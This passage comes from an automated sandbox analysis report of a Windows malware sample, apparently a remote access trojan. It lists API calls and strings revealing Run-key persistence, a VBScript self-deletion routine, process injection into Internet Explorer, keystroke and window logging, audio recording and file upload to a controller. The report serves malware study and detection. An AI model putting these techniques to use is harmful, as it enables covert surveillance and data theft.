                              • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
                              • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BD63
                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040BD76
                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDA6
                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00472200,pth_unenc,004721E8), ref: 0040BDB5
                              • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(00409305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
                              • Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
                              • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823
                              • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BFD0
                            • ExitProcess.KERNEL32 ref: 0040BFD7
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                            • String ID: ")$.vbs$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                            • API String ID: 3797177996-2974882535
                            • Opcode ID: 631efead2f1a7aa74ba651dc5d5e4e8b052369c469df6eda5620e8cdf42f0076
                            • Instruction ID: 6c8f8b33712d81dc7036d24bc004af62d002185c7e194acf753e7914dc64dab3
                            • Opcode Fuzzy Hash: 631efead2f1a7aa74ba651dc5d5e4e8b052369c469df6eda5620e8cdf42f0076
                            • Instruction Fuzzy Hash: DD816E716042405AC714FB62D8929EF77A8AF90708F10443FF586A71E2EF789E49C69E
                            APIs
                            • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 004190F2
                            • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00419106
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00463050), ref: 0041912E
                            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00471E78,00000000), ref: 00419144
                            • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00419185
                            • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041919D
                            • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 004191B2
                            • SetEvent.KERNEL32 ref: 004191CF
                            • WaitForSingleObject.KERNEL32(000001F4), ref: 004191E0
                            • CloseHandle.KERNEL32 ref: 004191F0
                            • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00419212
                            • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041921C
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                            • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                            • API String ID: 738084811-1354618412
                            • Opcode ID: 86fd4772b83d80fa8e497525ba6a2bc9e4fac7079830c2c2d6cb57e0af13d410
                            • Instruction ID: 6660e32d934ed13bda46fa62e77153e47455c80990ba371f4f5bcee5a70a39dd
                            • Opcode Fuzzy Hash: 86fd4772b83d80fa8e497525ba6a2bc9e4fac7079830c2c2d6cb57e0af13d410
                            • Instruction Fuzzy Hash: 6C5191712043056BD604FB75DC96EBF369CDB81398F10053FF44A621E2EE789D898A6E
                            APIs
                            • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                            • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401AE3
                            • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401AF3
                            • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B03
                            • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B13
                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B23
                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B34
                            • WriteFile.KERNEL32(00000000,0046FA9A,00000002,00000000,00000000), ref: 00401B45
                            • WriteFile.KERNEL32(00000000,0046FA9C,00000004,00000000,00000000), ref: 00401B55
                            • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B65
                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B76
                            • WriteFile.KERNEL32(00000000,0046FAA6,00000002,00000000,00000000), ref: 00401B87
                            • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401B97
                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BA7
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Write$Create
                            • String ID: RIFF$WAVE$data$fmt
                            • API String ID: 1602526932-4212202414
                            • Opcode ID: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
                            • Instruction ID: fa9573d22dfebaa7cc70b9682dc8642ba3498ee27ac2ec60dc87a96e6c13d219
                            • Opcode Fuzzy Hash: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
                            • Instruction Fuzzy Hash: 46416F726543197AE210DB91DD85FBB7EECEB85B50F40042AF648D6080E7A4E909DBB3
                            APIs
                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041382B
                            • LoadLibraryA.KERNEL32(?), ref: 0041386D
                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041388D
                            • FreeLibrary.KERNEL32(00000000), ref: 00413894
                            • LoadLibraryA.KERNEL32(?), ref: 004138CC
                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004138DE
                            • FreeLibrary.KERNEL32(00000000), ref: 004138E5
                            • GetProcAddress.KERNEL32(00000000,?), ref: 004138F4
                            • FreeLibrary.KERNEL32(00000000), ref: 0041390B
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Library$AddressFreeProc$Load$DirectorySystem
                            • String ID: \ws2_32$\wship6$`3A$freeaddrinfo$getaddrinfo$getnameinfo
                            • API String ID: 2490988753-3443138237
                            • Opcode ID: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
                            • Instruction ID: d28fd91e0c22c3548fe93de424e57890752fc739e59a71d3c7449bb4191d4936
                            • Opcode Fuzzy Hash: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
                            • Instruction Fuzzy Hash: 8831C0B2502315ABC720AF25DC489CBBBEC9F48755F41062AF84593251E7B8CE8486AE
                            APIs
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$EnvironmentVariable$_wcschr
                            • String ID:
                            • API String ID: 3899193279-0
                            • Opcode ID: 684045cb82c272c6e2ac36361ff8b964f23035e186c2d5dbd227a350b29f8928
                            • Instruction ID: f90cfe9d57a3c7213274ca364bab7ea13f4483d5bd7e80e8c07ab134bc70d503
                            • Opcode Fuzzy Hash: 684045cb82c272c6e2ac36361ff8b964f23035e186c2d5dbd227a350b29f8928
                            • Instruction Fuzzy Hash: 80D136719023007BFB60AF7598C166B7BA4AF15718F09817FF985A7381FB3989008B5D
                            APIs
                            • ___free_lconv_mon.LIBCMT ref: 0044E4EA
                              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D6FF
                              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D711
                              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D723
                              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D735
                              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D747
                              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D759
                              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D76B
                              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D77D
                              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D78F
                              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7A1
                              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7B3
                              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7C5
                              • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7D7
                            • _free.LIBCMT ref: 0044E4DF
                              • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                              • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                            • _free.LIBCMT ref: 0044E501
                            • _free.LIBCMT ref: 0044E516
                            • _free.LIBCMT ref: 0044E521
                            • _free.LIBCMT ref: 0044E543
                            • _free.LIBCMT ref: 0044E556
                            • _free.LIBCMT ref: 0044E564
                            • _free.LIBCMT ref: 0044E56F
                            • _free.LIBCMT ref: 0044E5A7
                            • _free.LIBCMT ref: 0044E5AE
                            • _free.LIBCMT ref: 0044E5CB
                            • _free.LIBCMT ref: 0044E5E3
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                            • String ID: pF
                            • API String ID: 161543041-2973420481
                            • Opcode ID: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                            • Instruction ID: 6e8371ae3b83bc2427c047bff221b97f6cd80994471b0a2caeb41cff5b169df7
                            • Opcode Fuzzy Hash: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                            • Instruction Fuzzy Hash: D4315072500304AFFB205E7AD945B5BB3E5BF00719F55851FE488D6251EE39ED408B18
                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004118B2
                              • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
                              • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
                              • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                            • Sleep.KERNEL32(0000000A,00462E24), ref: 00411A01
                            • Sleep.KERNEL32(0000000A,00462E24,00462E24), ref: 00411AA3
                            • Sleep.KERNEL32(0000000A,00462E24,00462E24,00462E24), ref: 00411B42
                            • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411B9F
                            • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411BCF
                            • DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 00411C05
                            • Sleep.KERNEL32(000001F4,00462E24,00462E24,00462E24), ref: 00411C25
                            • Sleep.KERNEL32(00000064), ref: 00411C63
                              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                            • String ID: /stext "$$.F$@#G$@#G
                            • API String ID: 1223786279-2596709126
                            • Opcode ID: bd53cf9864bd20e9c524ce1cfd37af81de888470282f81bcb092bebe0936cb7c
                            • Instruction ID: f36e1428a9e5a2dc2e21cca38a330b771dfaab2ce7ac60874593ee94e899fa44
                            • Opcode Fuzzy Hash: bd53cf9864bd20e9c524ce1cfd37af81de888470282f81bcb092bebe0936cb7c
                            • Instruction Fuzzy Hash: 1CF154311083415AD328FB65D896AEFB3D5AFD0348F40093FF586521E2EF789A4DC69A
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free
                            • String ID: pF
                            • API String ID: 269201875-2973420481
                            • Opcode ID: e28a4125cd182155f8106b0edc14aa680027b5eb54e98ed2c6064bdca11899c6
                            • Instruction ID: 42ad863364e9847d0c0ab7d3fc56807329b255bf3c924c15ca724e031f0c4a7b
                            • Opcode Fuzzy Hash: e28a4125cd182155f8106b0edc14aa680027b5eb54e98ed2c6064bdca11899c6
                            • Instruction Fuzzy Hash: 4CC17576D40204ABEB20DFA9CC82FEE77F8AF09B05F154156FE04FB282D674A9458754
                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00472248,00471FFC,?,00000001), ref: 0040DE4E
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000001), ref: 0040DE79
                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040DE95
                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040DF14
                            • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000001), ref: 0040DF23
                              • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001), ref: 0040E047
                            • CloseHandle.KERNEL32(00000000,C:\Program Files(x86)\Internet Explorer\,?,00000001), ref: 0040E133
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
                            • String ID: 0"G$C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$!G
                            • API String ID: 193334293-3226144251
                            • Opcode ID: cf6d12ac23d3bea58c4b9e5c443ef1de1d55369046223e9cec53eb66751e9ba7
                            • Instruction ID: 8a3cf51a80cb2752f7e3b1027b115d9c77e2b7a511041fa54b012784d9d6af0a
                            • Opcode Fuzzy Hash: cf6d12ac23d3bea58c4b9e5c443ef1de1d55369046223e9cec53eb66751e9ba7
                            • Instruction Fuzzy Hash: DB8121305083419BCA54FB61D8919EEB7E4AFA0348F40493FF586631E2EF78994DC75A
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041A43B
                            • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041A47F
                            • RegCloseKey.ADVAPI32(?), ref: 0041A749
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEnumOpen
                            • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                            • API String ID: 1332880857-3714951968
                            • Opcode ID: 202c19da245d775da939d21b29cef2875a47ec0cac4e3383d9ae15c6a26c9ad4
                            • Instruction ID: 699f57f5c891f1d806a7f6c627c3d9f808e7165cae3c76f1f7c8ebce292c0808
                            • Opcode Fuzzy Hash: 202c19da245d775da939d21b29cef2875a47ec0cac4e3383d9ae15c6a26c9ad4
                            • Instruction Fuzzy Hash: BC8152311183419BC328EB51D891EEFB7E8EF94348F10493FF586921E2EF749949CA5A
                            APIs
                            • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041B38F
                            • GetCursorPos.USER32(?), ref: 0041B39E
                            • SetForegroundWindow.USER32(?), ref: 0041B3A7
                            • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041B3C1
                            • Shell_NotifyIconA.SHELL32(00000002,00471AE0), ref: 0041B412
                            • ExitProcess.KERNEL32 ref: 0041B41A
                            • CreatePopupMenu.USER32 ref: 0041B420
                            • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041B435
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                            • String ID: Close
                            • API String ID: 1657328048-3535843008
                            • Opcode ID: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
                            • Instruction ID: 8a5f592793453ec618f968136b1e584160f7030753e38ead18fcaf25e3e96fa7
                            • Opcode Fuzzy Hash: a6176c0d6380f4aee2a94f66beec31abf772cd011930890969aeab0fce4376ca
                            • Instruction Fuzzy Hash: EB211B31110209BFDF054FA4ED0DAAA3F75FB04302F458125F906D2176D7B5D9A0AB59
                            APIs
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$Info
                            • String ID:
                            • API String ID: 2509303402-0
                            • Opcode ID: 543c517478803d648db1551973bdeb7e45e3e7bd29ee356e71c77ae2fe33fa89
                            • Instruction ID: c21780bae5ed168c96e0403295faec6c801d35bf5d84feaa2b3ea2b847582f92
                            • Opcode Fuzzy Hash: 543c517478803d648db1551973bdeb7e45e3e7bd29ee356e71c77ae2fe33fa89
                            • Instruction Fuzzy Hash: 70B1D171900305AFEB11DF69C881BEEBBF4BF08705F14456EF588A7342DB799A418B24
                            APIs
                            • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407D1F
                            • GetFileSizeEx.KERNEL32(00000000,?), ref: 00407D57
                            • __aulldiv.LIBCMT ref: 00407D89
                              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                              • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                            • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00407EAC
                            • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407EC7
                            • CloseHandle.KERNEL32(00000000), ref: 00407FA0
                            • CloseHandle.KERNEL32(00000000,00000052), ref: 00407FEA
                            • CloseHandle.KERNEL32(00000000), ref: 00408038
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                            • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
                            • API String ID: 3086580692-2596673759
                            • Opcode ID: 3628a73cbb86b5736265ac293d311146e85fdcb2316ed178213f0337e0fbe7ae
                            • Instruction ID: 8e1224200a6c450cfdafa1dd663dcbd78fa1a86951e699dbe30fbedc525f5c9c
                            • Opcode Fuzzy Hash: 3628a73cbb86b5736265ac293d311146e85fdcb2316ed178213f0337e0fbe7ae
                            • Instruction Fuzzy Hash: 05B191316083409BC354FB65C891AAFB7E9AFD4314F40492FF489622D2EF789D458B8B
                            APIs
                              • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
                              • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
                              • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                              • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                              • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C412
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C571
                            • ExitProcess.KERNEL32 ref: 0040C57D
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                            • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$H"G$Temp$exepath$open
                            • API String ID: 1913171305-2600661426
                            • Opcode ID: c86d61277acc14c68f24433c0b654e0e29c296f6a8d4ad8667fc6f6870691cc8
                            • Instruction ID: b2ba4f5629099335deb4bd311fc34f74cd7c7cff7cc2b9b794c872af44b42b62
                            • Opcode Fuzzy Hash: c86d61277acc14c68f24433c0b654e0e29c296f6a8d4ad8667fc6f6870691cc8
                            • Instruction Fuzzy Hash: 214132319001185ACB14FBA2DC96DEE7778AF50708F50017FF506B71E2EE785E4ACA99
                            APIs
                            • connect.WS2_32(?,?,?), ref: 004048C0
                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049E0
                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049EE
                            • WSAGetLastError.WS2_32 ref: 00404A01
                              • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateEvent$ErrorLastLocalTimeconnect
                            • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                            • API String ID: 994465650-2151626615
                            • Opcode ID: b56ab407b7d85cc5e8983cef37c9724a1f5c45cc3ea0a996f87df1f4b9ef746f
                            • Instruction ID: f1749a2af40dec866484330b2464a30bcc7489b9f615ba144f2b3c776ade1d80
                            • Opcode Fuzzy Hash: b56ab407b7d85cc5e8983cef37c9724a1f5c45cc3ea0a996f87df1f4b9ef746f
                            • Instruction Fuzzy Hash: 37412AB5B406017BD608777A8E1B96E7625AB81304B50017FF901136D2EBBD9C2197DF
                            APIs
                              • Part of subcall function 00452A89: CreateFileW.KERNEL32(?,00000008,00000007,d.E,?,?,00000000,?,00452E64,00000000,0000000C), ref: 00452AA6
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452ECF
                            • __dosmaperr.LIBCMT ref: 00452ED6
                            • GetFileType.KERNEL32(00000000), ref: 00452EE2
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452EEC
                            • __dosmaperr.LIBCMT ref: 00452EF5
                            • CloseHandle.KERNEL32(00000000), ref: 00452F15
                            • CloseHandle.KERNEL32(00000000), ref: 0045305F
                            • GetLastError.KERNEL32 ref: 00453091
                            • __dosmaperr.LIBCMT ref: 00453098
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                            • String ID: H
                            • API String ID: 4237864984-2852464175
                            • Opcode ID: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
                            • Instruction ID: def4621c7e831d5678052e1043e56ea9e2bfce8be848437acb5cac56d61a7e39
                            • Opcode Fuzzy Hash: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
                            • Instruction Fuzzy Hash: CAA15832A101049FDF19EF68D8417AE7BB1AB0A325F14015FFC419B392DB798D1ACB5A
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 65535$udp
                            • API String ID: 0-1267037602
                            • Opcode ID: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
                            • Instruction ID: 74e44cdacc71272d4b4fe4479ff5a2c38cc960f39e0e81ce023821ae7ff597b0
                            • Opcode Fuzzy Hash: 28a355c3c2c5299b67e9df14989e725b3f395b8ff7de4f3ce545a5dea485fe56
                            • Instruction Fuzzy Hash: 3151F1F5209302ABD7209E15C809BBB77D4AB84B52F08842FF8A1973D0D76CDEC0965E
                            APIs
                            • __Init_thread_footer.LIBCMT ref: 00409C81
                            • Sleep.KERNEL32(000001F4), ref: 00409C8C
                            • GetForegroundWindow.USER32 ref: 00409C92
                            • GetWindowTextLengthW.USER32(00000000), ref: 00409C9B
                            • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 00409CCF
                            • Sleep.KERNEL32(000003E8), ref: 00409D9D
                              • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                            • String ID: [${ User has been idle for $ minutes }$]
                            • API String ID: 911427763-3954389425
                            • Opcode ID: a44f1e588b244d76f3851291f59a3d8a0f12b55ab3dd92a15c41ef104020a1a6
                            • Instruction ID: 7a62ae1493acfbf190be1d0992f15f5c774c3bdccfea44e4f2dca48363f02a21
                            • Opcode Fuzzy Hash: a44f1e588b244d76f3851291f59a3d8a0f12b55ab3dd92a15c41ef104020a1a6
                            • Instruction Fuzzy Hash: 7C5193716043405BD304FB61D855A6EB795AF84308F50093FF486A62E3DF7CAE45C69A
                            APIs
                            • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040C753
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
